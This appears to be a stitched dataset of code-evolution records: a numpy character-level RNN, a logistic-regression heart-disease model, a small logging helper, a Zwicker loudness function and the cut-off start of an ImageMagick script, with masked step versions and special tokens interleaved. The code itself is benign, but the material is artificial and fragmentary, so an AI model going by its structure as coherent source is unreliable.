[mU, mW, mV, mbh, mby]\n for i in range(len(param)):\n mem[i] += dparam[i] * dparam[i]\n param[i] += -learning_rate * dparam[i] / np.sqrt(mem[i] + 1e-08)\n p += seq_length\n",
"step-4": "import numpy as np\ndata = open('input.txt', 'r').read()\nchars = list(set(data))\ndata_size, vocab_size = len(data), len(chars)\nprint('chars: ', chars)\nchar_to_ix = {ch: i for i, ch in enumerate(chars)}\nix_to_char = {i: ch for i, ch in enumerate(chars)}\niteration = 50000\nhidden_size = 100\nseq_length = 25\nlearning_rate = 0.1\nU = np.random.randn(hidden_size, vocab_size) * 0.01\nW = np.random.randn(hidden_size, hidden_size) * 0.01\nV = np.random.randn(vocab_size, hidden_size) * 0.01\nbh = np.zeros((hidden_size, 1))\nby = np.zeros((vocab_size, 1))\n\n\ndef lossFun(inputs, targets, hprev):\n x, h, yprime = {}, {}, {}\n h[-1] = np.copy(hprev)\n loss = 0\n for t in range(len(inputs)):\n x[t] = np.zeros((vocab_size, 1))\n x[t][inputs[t]] = 1\n h[t] = np.tanh(np.dot(U, x[t]) + np.dot(W, h[t - 1]) + bh)\n temp = np.dot(V, h[t]) + by\n yprime[t] = np.exp(temp) / np.sum(np.exp(temp))\n loss += -np.log(yprime[t][targets[t], 0])\n dU, dW, dV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\n dbh, dby = np.zeros_like(bh), np.zeros_like(by)\n dhnext = np.zeros_like(h[0])\n for t in reversed(range(len(inputs))):\n dy = np.copy(yprime[t])\n dy[targets[t]] -= 1\n dV += np.dot(dy, h[t].T)\n dby += dy\n dh = np.dot(V.T, dy) + dhnext\n dhraw = (1 - h[t] * h[t]) * dh\n dbh += dhraw\n dU += np.dot(dhraw, x[t].T)\n dW += np.dot(dhraw, h[t - 1].T)\n dhnext = np.dot(W.T, dhraw)\n for dparam in [dU, dW, dV, dbh, dby]:\n np.clip(dparam, -5, 5, out=dparam)\n return loss, dU, dW, dV, dbh, dby, h[len(inputs) - 1]\n\n\nn, p = 0, 0\nmU, mW, mV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\nmbh, mby = np.zeros_like(bh), np.zeros_like(by)\nsmooth_loss = -np.log(1.0 / vocab_size) * seq_length\nfor n in range(iteration):\n if p + seq_length + 1 >= len(data) or n == 0:\n hprev = np.zeros((hidden_size, 1))\n p = 0\n inputs = [char_to_ix[ch] for ch in data[p:p + seq_length]]\n targets = [char_to_ix[ch] for ch in data[p + 1:p + seq_length + 1]]\n loss, dU, dW, dV, dbh, dby, hprev = lossFun(inputs, targets, hprev)\n smooth_loss = smooth_loss * 0.999 + loss * 0.001\n if n % 100 == 0:\n print(n, smooth_loss)\n param = [U, W, V, bh, by]\n dparam = [dU, dW, dV, dbh, dby]\n mem = [mU, mW, mV, mbh, mby]\n for i in range(len(param)):\n mem[i] += dparam[i] * dparam[i]\n param[i] += -learning_rate * dparam[i] / np.sqrt(mem[i] + 1e-08)\n p += seq_length\n",
"step-5": "import numpy as np\n\n# data I/O\ndata = open('input.txt', 'r').read() # should be simple plain text file\nchars = list(set(data))\ndata_size, vocab_size = len(data), len(chars)\nprint(\"chars: \", chars)\n#one-hot encoding\nchar_to_ix = { ch:i for i,ch in enumerate(chars) }\nix_to_char = { i:ch for i,ch in enumerate(chars) }\n\niteration=50000\nhidden_size = 100 \nseq_length = 25\nlearning_rate = 1e-1\n\n# model parameters\nU = np.random.randn(hidden_size, vocab_size)*0.01 # input to hidden\nW = np.random.randn(hidden_size, hidden_size)*0.01 # hidden to hidden\nV = np.random.randn(vocab_size, hidden_size)*0.01 # hidden to output\nbh = np.zeros((hidden_size, 1)) # hidden bias\nby = np.zeros((vocab_size, 1)) # output bias\n\ndef lossFun(inputs, targets, hprev):\n x, h, yprime = {}, {}, {}\n h[-1] = np.copy(hprev)\n loss = 0\n # forward pass\n for t in range(len(inputs)):\n x[t] = np.zeros((vocab_size,1)) \n x[t][inputs[t]] = 1 # encode-1ofk representation \n h[t] = np.tanh(np.dot(U, x[t]) + np.dot(W, h[t-1]) + bh) \n temp=np.dot(V, h[t]) + by\n yprime[t] = np.exp(temp) / np.sum(np.exp(temp))\n loss += -np.log(yprime[t][targets[t],0]) # softmax (cross-entropy loss) for 1-of-k representaiton\n\n # backprop\n dU, dW, dV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\n dbh, dby = np.zeros_like(bh), np.zeros_like(by)\n dhnext = np.zeros_like(h[0])\n\n for t in reversed(range(len(inputs))):\n dy = np.copy(yprime[t])\n dy[targets[t]] -= 1 # backprop into y. http://cs231n.github.io/neural-networks-case-study/#grad\n dV += np.dot(dy, h[t].T)\n dby += dy\n dh = np.dot(V.T, dy) + dhnext # backprop into h\n dhraw = (1 - h[t] * h[t]) * dh # backprop through tanh nonlinearity\n dbh += dhraw\n dU += np.dot(dhraw, x[t].T)\n dW += np.dot(dhraw, h[t-1].T)\n dhnext = np.dot(W.T, dhraw)\n for dparam in [dU, dW, dV, dbh, dby]:\n np.clip(dparam, -5, 5, out=dparam) # clip to mitigate exploding gradients\n return loss, dU, dW, dV, dbh, dby, h[len(inputs)-1]\n\nn, p = 0, 0\nmU, mW, mV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\nmbh, mby = np.zeros_like(bh), np.zeros_like(by) # memory variables for Adagrad\nsmooth_loss = -np.log(1.0/vocab_size)*seq_length # loss at iteration 0\n\nfor n in range(iteration):\n if p+seq_length+1 >= len(data) or n == 0: \n hprev = np.zeros((hidden_size,1)) # reset RNN memory\n p = 0 \n inputs = [char_to_ix[ch] for ch in data[p:p+seq_length]]\n targets = [char_to_ix[ch] for ch in data[p+1:p+seq_length+1]]\n\n loss, dU, dW, dV, dbh, dby, hprev = lossFun(inputs, targets, hprev)\n smooth_loss = smooth_loss * 0.999 + loss * 0.001 \n\n if n % 100 == 0: \n print (n,smooth_loss)\n\n # perform parameter update with Adagrad\n # for param, dparam, mem in zip([U, W, V, bh, by], \n # [dU, dW, dV, dbh, dby], \n # [mU, mW, mV, mbh, mby]):\n # mem += dparam * dparam\n # param += -learning_rate * dparam / np.sqrt(mem + 1e-8) # adagrad update\n\n param=[U, W, V, bh, by]\n dparam=[dU, dW, dV, dbh, dby]\n mem=[mU, mW, mV, mbh, mby]\n for i in range(len(param)): \n mem[i] += dparam[i] * dparam[i]\n param[i] += -learning_rate * dparam[i] / np.sqrt(mem[i] + 1e-8) # adagrad update\n\n p += seq_length # move data pointer\n # n += 1 # iteration counter \n # if n>iteration:\n # print(\"done\")\n # sys.exit(0)\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
lr.fit(x_train, y_train)
<|reserved_special_token_0|>
pickle.dump(lr, open('model.pkl', 'wb'))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
dataset = pd.read_csv('heart.csv')
df = dataset.copy()
X = df.drop(['target'], axis=1).values
Y = df.target.values
corr_mat = df.corr()
x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.3,
random_state=1234, stratify=Y)
lr = LogisticRegression()
lr.fit(x_train, y_train)
y_predict = lr.predict(x_test)
train_score = lr.score(x_train, y_train)
test_score = lr.score(x_test, y_test)
acc_score = accuracy_score(y_test, y_predict)
rmse = math.sqrt(mean_squared_error(y_test, y_predict))
lr_cross = LogisticRegression()
cv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)
test_cv_avg = np.average(cv_results_lr['test_score'])
train_cv_avg = np.average(cv_results_lr['train_score'])
pickle.dump(lr, open('model.pkl', 'wb'))
<|reserved_special_token_1|>
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import warnings
import pickle
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from sklearn.metrics import mean_squared_error
import math
from sklearn.model_selection import cross_validate
dataset = pd.read_csv('heart.csv')
df = dataset.copy()
X = df.drop(['target'], axis=1).values
Y = df.target.values
corr_mat = df.corr()
x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.3,
random_state=1234, stratify=Y)
lr = LogisticRegression()
lr.fit(x_train, y_train)
y_predict = lr.predict(x_test)
train_score = lr.score(x_train, y_train)
test_score = lr.score(x_test, y_test)
acc_score = accuracy_score(y_test, y_predict)
rmse = math.sqrt(mean_squared_error(y_test, y_predict))
lr_cross = LogisticRegression()
cv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)
test_cv_avg = np.average(cv_results_lr['test_score'])
train_cv_avg = np.average(cv_results_lr['train_score'])
pickle.dump(lr, open('model.pkl', 'wb'))
<|reserved_special_token_1|>
# import libraries
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import warnings
import pickle
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from sklearn.metrics import mean_squared_error
import math
from sklearn.model_selection import cross_validate
# read the csv file
dataset = pd.read_csv('heart.csv')
#copy the dataset
df = dataset.copy()
# make X and Y
X = df.drop(['target'], axis=1).values
Y = df.target.values
# correleation matrix
corr_mat = df.corr()
# split based on training and test dataset
x_train, x_test, y_train, y_test = \
train_test_split(X,Y,test_size =0.3,random_state=1234,stratify=Y)
# Logistic regression
lr = LogisticRegression()
lr.fit(x_train, y_train)
y_predict = lr.predict(x_test)
train_score = lr.score(x_train, y_train)
test_score = lr.score(x_test, y_test)
# accuracy score
acc_score = accuracy_score(y_test, y_predict)
rmse = math.sqrt(mean_squared_error(y_test, y_predict))
# Cross validation
lr_cross = LogisticRegression()
cv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)
test_cv_avg = np.average(cv_results_lr['test_score'])
train_cv_avg = np.average(cv_results_lr['train_score'])
pickle.dump(lr, open('model.pkl','wb'))
|
flexible
|
{
"blob_id": "1508697f93114d7f20182a3e9c1df5617904529a",
"index": 8725,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nlr.fit(x_train, y_train)\n<mask token>\npickle.dump(lr, open('model.pkl', 'wb'))\n",
"step-3": "<mask token>\ndataset = pd.read_csv('heart.csv')\ndf = dataset.copy()\nX = df.drop(['target'], axis=1).values\nY = df.target.values\ncorr_mat = df.corr()\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.3,\n random_state=1234, stratify=Y)\nlr = LogisticRegression()\nlr.fit(x_train, y_train)\ny_predict = lr.predict(x_test)\ntrain_score = lr.score(x_train, y_train)\ntest_score = lr.score(x_test, y_test)\nacc_score = accuracy_score(y_test, y_predict)\nrmse = math.sqrt(mean_squared_error(y_test, y_predict))\nlr_cross = LogisticRegression()\ncv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)\ntest_cv_avg = np.average(cv_results_lr['test_score'])\ntrain_cv_avg = np.average(cv_results_lr['train_score'])\npickle.dump(lr, open('model.pkl', 'wb'))\n",
"step-4": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport warnings\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import mean_squared_error\nimport math\nfrom sklearn.model_selection import cross_validate\ndataset = pd.read_csv('heart.csv')\ndf = dataset.copy()\nX = df.drop(['target'], axis=1).values\nY = df.target.values\ncorr_mat = df.corr()\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.3,\n random_state=1234, stratify=Y)\nlr = LogisticRegression()\nlr.fit(x_train, y_train)\ny_predict = lr.predict(x_test)\ntrain_score = lr.score(x_train, y_train)\ntest_score = lr.score(x_test, y_test)\nacc_score = accuracy_score(y_test, y_predict)\nrmse = math.sqrt(mean_squared_error(y_test, y_predict))\nlr_cross = LogisticRegression()\ncv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)\ntest_cv_avg = np.average(cv_results_lr['test_score'])\ntrain_cv_avg = np.average(cv_results_lr['train_score'])\npickle.dump(lr, open('model.pkl', 'wb'))\n",
"step-5": "# import libraries\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport warnings\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import mean_squared_error\nimport math\nfrom sklearn.model_selection import cross_validate\n\n\n# read the csv file\ndataset = pd.read_csv('heart.csv')\n\n#copy the dataset\ndf = dataset.copy()\n\n# make X and Y\nX = df.drop(['target'], axis=1).values\nY = df.target.values\n\n\n# correleation matrix\ncorr_mat = df.corr()\n\n\n# split based on training and test dataset\n\nx_train, x_test, y_train, y_test = \\\n train_test_split(X,Y,test_size =0.3,random_state=1234,stratify=Y)\n \n\n# Logistic regression\n\nlr = LogisticRegression()\nlr.fit(x_train, y_train)\n\ny_predict = lr.predict(x_test)\n\ntrain_score = lr.score(x_train, y_train)\ntest_score = lr.score(x_test, y_test)\n\n\n# accuracy score\n\nacc_score = accuracy_score(y_test, y_predict)\n\n\nrmse = math.sqrt(mean_squared_error(y_test, y_predict))\n\n\n# Cross validation\n\nlr_cross = LogisticRegression()\n\ncv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)\n\ntest_cv_avg = np.average(cv_results_lr['test_score'])\ntrain_cv_avg = np.average(cv_results_lr['train_score'])\n\npickle.dump(lr, open('model.pkl','wb'))\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
'''
log.py
version 1.0 - 18.03.2020
Logging fuer mehrere Szenarien
'''
# Imports
import datetime
# Globale Variablen
ERROR_FILE = "error.log"
LOG_FILE = "application.log"
def error(msg):
__log_internal(ERROR_FILE, msg)
def info(msg):
__log_internal(LOG_FILE, msg)
def __log_internal(filename, msg):
now = datetime.datetime.now()
f = open(filename, "a+")
f.write("{} : {}\n".format(now.strftime("%Y-%m-%d %H:%M:%S"), msg))
f.close()
if __name__ == '__main__':
print("Erstelle Testfiles")
info("Test")
error("Test")
|
normal
|
{
"blob_id": "0475c6cab353f0d23a4c4b7f78c1b47ecc5f8d3b",
"index": 4819,
"step-1": "<mask token>\n\n\ndef error(msg):\n __log_internal(ERROR_FILE, msg)\n\n\ndef info(msg):\n __log_internal(LOG_FILE, msg)\n\n\ndef __log_internal(filename, msg):\n now = datetime.datetime.now()\n f = open(filename, 'a+')\n f.write('{} : {}\\n'.format(now.strftime('%Y-%m-%d %H:%M:%S'), msg))\n f.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef error(msg):\n __log_internal(ERROR_FILE, msg)\n\n\ndef info(msg):\n __log_internal(LOG_FILE, msg)\n\n\ndef __log_internal(filename, msg):\n now = datetime.datetime.now()\n f = open(filename, 'a+')\n f.write('{} : {}\\n'.format(now.strftime('%Y-%m-%d %H:%M:%S'), msg))\n f.close()\n\n\nif __name__ == '__main__':\n print('Erstelle Testfiles')\n info('Test')\n error('Test')\n",
"step-3": "<mask token>\nERROR_FILE = 'error.log'\nLOG_FILE = 'application.log'\n\n\ndef error(msg):\n __log_internal(ERROR_FILE, msg)\n\n\ndef info(msg):\n __log_internal(LOG_FILE, msg)\n\n\ndef __log_internal(filename, msg):\n now = datetime.datetime.now()\n f = open(filename, 'a+')\n f.write('{} : {}\\n'.format(now.strftime('%Y-%m-%d %H:%M:%S'), msg))\n f.close()\n\n\nif __name__ == '__main__':\n print('Erstelle Testfiles')\n info('Test')\n error('Test')\n",
"step-4": "<mask token>\nimport datetime\nERROR_FILE = 'error.log'\nLOG_FILE = 'application.log'\n\n\ndef error(msg):\n __log_internal(ERROR_FILE, msg)\n\n\ndef info(msg):\n __log_internal(LOG_FILE, msg)\n\n\ndef __log_internal(filename, msg):\n now = datetime.datetime.now()\n f = open(filename, 'a+')\n f.write('{} : {}\\n'.format(now.strftime('%Y-%m-%d %H:%M:%S'), msg))\n f.close()\n\n\nif __name__ == '__main__':\n print('Erstelle Testfiles')\n info('Test')\n error('Test')\n",
"step-5": "'''\n log.py\n\n version 1.0 - 18.03.2020\n\n Logging fuer mehrere Szenarien\n'''\n\n# Imports\nimport datetime\n\n# Globale Variablen\nERROR_FILE = \"error.log\"\nLOG_FILE = \"application.log\"\n\n\ndef error(msg):\n __log_internal(ERROR_FILE, msg)\n\n\ndef info(msg):\n __log_internal(LOG_FILE, msg)\n\n\ndef __log_internal(filename, msg):\n now = datetime.datetime.now()\n f = open(filename, \"a+\")\n f.write(\"{} : {}\\n\".format(now.strftime(\"%Y-%m-%d %H:%M:%S\"), msg))\n f.close()\n\n\nif __name__ == '__main__':\n print(\"Erstelle Testfiles\")\n info(\"Test\")\n error(\"Test\")\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# -*- coding: utf-8 -*-
# Third party imports
import numpy as np
# Local application imports
from mosqito.sound_level_meter import noct_spectrum
from mosqito.sq_metrics.loudness.loudness_zwst._main_loudness import _main_loudness
from mosqito.sq_metrics.loudness.loudness_zwst._calc_slopes import _calc_slopes
from mosqito.utils.conversion import amp2db
# Optional package import
try:
from SciDataTool import DataTime, DataLinspace, DataFreq
except ImportError:
DataTime = None
DataLinspace = None
DataFreq = None
def loudness_zwst(signal, fs=None, field_type="free", is_sdt_output=False):
"""Zwicker-loudness calculation for stationary signals
Calculates the acoustic loudness according to Zwicker method for
stationary signals.
Normatice reference:
ISO 532:1975 (method B)
DIN 45631:1991
ISO 532-1:2017 (method 1)
The code is based on BASIC program published in "Program for
calculating loudness according to DIN 45631 (ISO 532B)", E.Zwicker
and H.Fastl, J.A.S.J (E) 12, 1 (1991).
Note that due to normative continuity, as defined in the
preceeding standards, the method is in accordance with
ISO 226:1987 equal loudness contours (instead of ISO 226:2003)
Parameters
----------
signal : numpy.array or DataTime object
Signal time values [Pa]
fs : float, optional
Sampling frequency, can be omitted if the input is a DataTime
object. Default to None
field_type : str
Type of soundfield corresponding to spec_third ("free" by
default or "diffuse").
is_sdt_output : Bool, optional
If True, the outputs are returned as SciDataTool objects.
Default to False
Outputs
-------
N : float or numpy.array
The overall loudness array [sones], size (Ntime,).
N_specific : numpy.ndarray or DataFreq object
The specific loudness array [sones/bark], size (Nbark, Ntime).
bark_axis: numpy.array
The Bark axis array, size (Nbark,).
"""
# Manage SciDataTool input type
if DataTime is not None and isinstance(signal, DataTime):
time = signal.get_along("time")["time"]
fs = 1 / (time[1] - time[0])
signal = signal.get_along("time")[signal.symbol]
# Compute third octave band spectrum
spec_third, _ = noct_spectrum(signal, fs, fmin=24, fmax=12600)
# Compute dB values
spec_third = amp2db(spec_third, ref=2e-5)
# Compute main loudness
Nm = _main_loudness(spec_third, field_type)
# Computation of specific loudness pattern and integration of overall
# loudness by attaching slopes towards higher frequencies
N, N_specific = _calc_slopes(Nm)
# Define Bark axis
bark_axis = np.linspace(0.1, 24, int(24 / 0.1))
# Manage SciDataTool output type
if is_sdt_output:
if DataLinspace is None:
raise RuntimeError(
"In order to handle Data objects you need the 'SciDataTool' package."
)
else:
bark_data = DataLinspace(
name="Critical band rate",
unit="Bark",
initial=0,
final=24,
number=int(24 / 0.1),
include_endpoint=True,
)
N_specific = DataFreq(
name="Specific loudness (Zwicker method for stationnary signal)",
symbol="N'_{zwst}",
axes=[bark_data],
values=N_specific,
unit="sone/Bark",
)
return N, N_specific, bark_axis
|
normal
|
{
"blob_id": "75716aaaca63f8ca6d32c885021c1dc0f9a12dac",
"index": 793,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef loudness_zwst(signal, fs=None, field_type='free', is_sdt_output=False):\n \"\"\"Zwicker-loudness calculation for stationary signals\n\n Calculates the acoustic loudness according to Zwicker method for\n stationary signals.\n Normatice reference:\n ISO 532:1975 (method B)\n DIN 45631:1991\n ISO 532-1:2017 (method 1)\n The code is based on BASIC program published in \"Program for\n calculating loudness according to DIN 45631 (ISO 532B)\", E.Zwicker\n and H.Fastl, J.A.S.J (E) 12, 1 (1991).\n Note that due to normative continuity, as defined in the\n preceeding standards, the method is in accordance with\n ISO 226:1987 equal loudness contours (instead of ISO 226:2003)\n\n Parameters\n ----------\n signal : numpy.array or DataTime object\n Signal time values [Pa]\n fs : float, optional\n Sampling frequency, can be omitted if the input is a DataTime\n object. Default to None\n field_type : str\n Type of soundfield corresponding to spec_third (\"free\" by\n default or \"diffuse\").\n is_sdt_output : Bool, optional\n If True, the outputs are returned as SciDataTool objects.\n Default to False\n\n Outputs\n -------\n N : float or numpy.array\n The overall loudness array [sones], size (Ntime,).\n N_specific : numpy.ndarray or DataFreq object\n The specific loudness array [sones/bark], size (Nbark, Ntime).\n bark_axis: numpy.array\n The Bark axis array, size (Nbark,).\n \"\"\"\n if DataTime is not None and isinstance(signal, DataTime):\n time = signal.get_along('time')['time']\n fs = 1 / (time[1] - time[0])\n signal = signal.get_along('time')[signal.symbol]\n spec_third, _ = noct_spectrum(signal, fs, fmin=24, fmax=12600)\n spec_third = amp2db(spec_third, ref=2e-05)\n Nm = _main_loudness(spec_third, field_type)\n N, N_specific = _calc_slopes(Nm)\n bark_axis = np.linspace(0.1, 24, int(24 / 0.1))\n if is_sdt_output:\n if DataLinspace is None:\n raise RuntimeError(\n \"In order to handle Data objects you need the 'SciDataTool' package.\"\n )\n else:\n bark_data = DataLinspace(name='Critical band rate', unit='Bark',\n initial=0, final=24, number=int(24 / 0.1), include_endpoint\n =True)\n N_specific = DataFreq(name=\n 'Specific loudness (Zwicker method for stationnary signal)',\n symbol=\"N'_{zwst}\", axes=[bark_data], values=N_specific,\n unit='sone/Bark')\n return N, N_specific, bark_axis\n",
"step-3": "<mask token>\ntry:\n from SciDataTool import DataTime, DataLinspace, DataFreq\nexcept ImportError:\n DataTime = None\n DataLinspace = None\n DataFreq = None\n\n\ndef loudness_zwst(signal, fs=None, field_type='free', is_sdt_output=False):\n \"\"\"Zwicker-loudness calculation for stationary signals\n\n Calculates the acoustic loudness according to Zwicker method for\n stationary signals.\n Normatice reference:\n ISO 532:1975 (method B)\n DIN 45631:1991\n ISO 532-1:2017 (method 1)\n The code is based on BASIC program published in \"Program for\n calculating loudness according to DIN 45631 (ISO 532B)\", E.Zwicker\n and H.Fastl, J.A.S.J (E) 12, 1 (1991).\n Note that due to normative continuity, as defined in the\n preceeding standards, the method is in accordance with\n ISO 226:1987 equal loudness contours (instead of ISO 226:2003)\n\n Parameters\n ----------\n signal : numpy.array or DataTime object\n Signal time values [Pa]\n fs : float, optional\n Sampling frequency, can be omitted if the input is a DataTime\n object. Default to None\n field_type : str\n Type of soundfield corresponding to spec_third (\"free\" by\n default or \"diffuse\").\n is_sdt_output : Bool, optional\n If True, the outputs are returned as SciDataTool objects.\n Default to False\n\n Outputs\n -------\n N : float or numpy.array\n The overall loudness array [sones], size (Ntime,).\n N_specific : numpy.ndarray or DataFreq object\n The specific loudness array [sones/bark], size (Nbark, Ntime).\n bark_axis: numpy.array\n The Bark axis array, size (Nbark,).\n \"\"\"\n if DataTime is not None and isinstance(signal, DataTime):\n time = signal.get_along('time')['time']\n fs = 1 / (time[1] - time[0])\n signal = signal.get_along('time')[signal.symbol]\n spec_third, _ = noct_spectrum(signal, fs, fmin=24, fmax=12600)\n spec_third = amp2db(spec_third, ref=2e-05)\n Nm = _main_loudness(spec_third, field_type)\n N, N_specific = _calc_slopes(Nm)\n bark_axis = np.linspace(0.1, 24, int(24 / 0.1))\n if is_sdt_output:\n if DataLinspace is None:\n raise RuntimeError(\n \"In order to handle Data objects you need the 'SciDataTool' package.\"\n )\n else:\n bark_data = DataLinspace(name='Critical band rate', unit='Bark',\n initial=0, final=24, number=int(24 / 0.1), include_endpoint\n =True)\n N_specific = DataFreq(name=\n 'Specific loudness (Zwicker method for stationnary signal)',\n symbol=\"N'_{zwst}\", axes=[bark_data], values=N_specific,\n unit='sone/Bark')\n return N, N_specific, bark_axis\n",
"step-4": "import numpy as np\nfrom mosqito.sound_level_meter import noct_spectrum\nfrom mosqito.sq_metrics.loudness.loudness_zwst._main_loudness import _main_loudness\nfrom mosqito.sq_metrics.loudness.loudness_zwst._calc_slopes import _calc_slopes\nfrom mosqito.utils.conversion import amp2db\ntry:\n from SciDataTool import DataTime, DataLinspace, DataFreq\nexcept ImportError:\n DataTime = None\n DataLinspace = None\n DataFreq = None\n\n\ndef loudness_zwst(signal, fs=None, field_type='free', is_sdt_output=False):\n \"\"\"Zwicker-loudness calculation for stationary signals\n\n Calculates the acoustic loudness according to Zwicker method for\n stationary signals.\n Normatice reference:\n ISO 532:1975 (method B)\n DIN 45631:1991\n ISO 532-1:2017 (method 1)\n The code is based on BASIC program published in \"Program for\n calculating loudness according to DIN 45631 (ISO 532B)\", E.Zwicker\n and H.Fastl, J.A.S.J (E) 12, 1 (1991).\n Note that due to normative continuity, as defined in the\n preceeding standards, the method is in accordance with\n ISO 226:1987 equal loudness contours (instead of ISO 226:2003)\n\n Parameters\n ----------\n signal : numpy.array or DataTime object\n Signal time values [Pa]\n fs : float, optional\n Sampling frequency, can be omitted if the input is a DataTime\n object. Default to None\n field_type : str\n Type of soundfield corresponding to spec_third (\"free\" by\n default or \"diffuse\").\n is_sdt_output : Bool, optional\n If True, the outputs are returned as SciDataTool objects.\n Default to False\n\n Outputs\n -------\n N : float or numpy.array\n The overall loudness array [sones], size (Ntime,).\n N_specific : numpy.ndarray or DataFreq object\n The specific loudness array [sones/bark], size (Nbark, Ntime).\n bark_axis: numpy.array\n The Bark axis array, size (Nbark,).\n \"\"\"\n if DataTime is not None and isinstance(signal, DataTime):\n time = signal.get_along('time')['time']\n fs = 1 / (time[1] - time[0])\n signal = signal.get_along('time')[signal.symbol]\n spec_third, _ = noct_spectrum(signal, fs, fmin=24, fmax=12600)\n spec_third = amp2db(spec_third, ref=2e-05)\n Nm = _main_loudness(spec_third, field_type)\n N, N_specific = _calc_slopes(Nm)\n bark_axis = np.linspace(0.1, 24, int(24 / 0.1))\n if is_sdt_output:\n if DataLinspace is None:\n raise RuntimeError(\n \"In order to handle Data objects you need the 'SciDataTool' package.\"\n )\n else:\n bark_data = DataLinspace(name='Critical band rate', unit='Bark',\n initial=0, final=24, number=int(24 / 0.1), include_endpoint\n =True)\n N_specific = DataFreq(name=\n 'Specific loudness (Zwicker method for stationnary signal)',\n symbol=\"N'_{zwst}\", axes=[bark_data], values=N_specific,\n unit='sone/Bark')\n return N, N_specific, bark_axis\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Third party imports\nimport numpy as np\n\n# Local application imports\nfrom mosqito.sound_level_meter import noct_spectrum\nfrom mosqito.sq_metrics.loudness.loudness_zwst._main_loudness import _main_loudness\nfrom mosqito.sq_metrics.loudness.loudness_zwst._calc_slopes import _calc_slopes\nfrom mosqito.utils.conversion import amp2db\n\n# Optional package import\ntry:\n from SciDataTool import DataTime, DataLinspace, DataFreq\nexcept ImportError:\n DataTime = None\n DataLinspace = None\n DataFreq = None\n\n\ndef loudness_zwst(signal, fs=None, field_type=\"free\", is_sdt_output=False):\n \"\"\"Zwicker-loudness calculation for stationary signals\n\n Calculates the acoustic loudness according to Zwicker method for\n stationary signals.\n Normatice reference:\n ISO 532:1975 (method B)\n DIN 45631:1991\n ISO 532-1:2017 (method 1)\n The code is based on BASIC program published in \"Program for\n calculating loudness according to DIN 45631 (ISO 532B)\", E.Zwicker\n and H.Fastl, J.A.S.J (E) 12, 1 (1991).\n Note that due to normative continuity, as defined in the\n preceeding standards, the method is in accordance with\n ISO 226:1987 equal loudness contours (instead of ISO 226:2003)\n\n Parameters\n ----------\n signal : numpy.array or DataTime object\n Signal time values [Pa]\n fs : float, optional\n Sampling frequency, can be omitted if the input is a DataTime\n object. Default to None\n field_type : str\n Type of soundfield corresponding to spec_third (\"free\" by\n default or \"diffuse\").\n is_sdt_output : Bool, optional\n If True, the outputs are returned as SciDataTool objects.\n Default to False\n\n Outputs\n -------\n N : float or numpy.array\n The overall loudness array [sones], size (Ntime,).\n N_specific : numpy.ndarray or DataFreq object\n The specific loudness array [sones/bark], size (Nbark, Ntime).\n bark_axis: numpy.array\n The Bark axis array, size (Nbark,).\n \"\"\"\n\n # Manage SciDataTool input type\n if DataTime is not None and isinstance(signal, DataTime):\n time = signal.get_along(\"time\")[\"time\"]\n fs = 1 / (time[1] - time[0])\n signal = signal.get_along(\"time\")[signal.symbol]\n\n # Compute third octave band spectrum\n spec_third, _ = noct_spectrum(signal, fs, fmin=24, fmax=12600)\n\n # Compute dB values\n spec_third = amp2db(spec_third, ref=2e-5)\n\n # Compute main loudness\n Nm = _main_loudness(spec_third, field_type)\n\n # Computation of specific loudness pattern and integration of overall\n # loudness by attaching slopes towards higher frequencies\n N, N_specific = _calc_slopes(Nm)\n\n # Define Bark axis\n bark_axis = np.linspace(0.1, 24, int(24 / 0.1))\n\n # Manage SciDataTool output type\n if is_sdt_output:\n if DataLinspace is None:\n raise RuntimeError(\n \"In order to handle Data objects you need the 'SciDataTool' package.\"\n )\n else:\n bark_data = DataLinspace(\n name=\"Critical band rate\",\n unit=\"Bark\",\n initial=0,\n final=24,\n number=int(24 / 0.1),\n include_endpoint=True,\n )\n N_specific = DataFreq(\n name=\"Specific loudness (Zwicker method for stationnary signal)\",\n symbol=\"N'_{zwst}\",\n axes=[bark_data],\n values=N_specific,\n unit=\"sone/Bark\",\n )\n\n return N, N_specific, bark_axis\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python2
import os
import sys
import textwrap
COMMAND = (
'convert -size 1920x1080 canvas:"rgb(149, 1, 1)" '
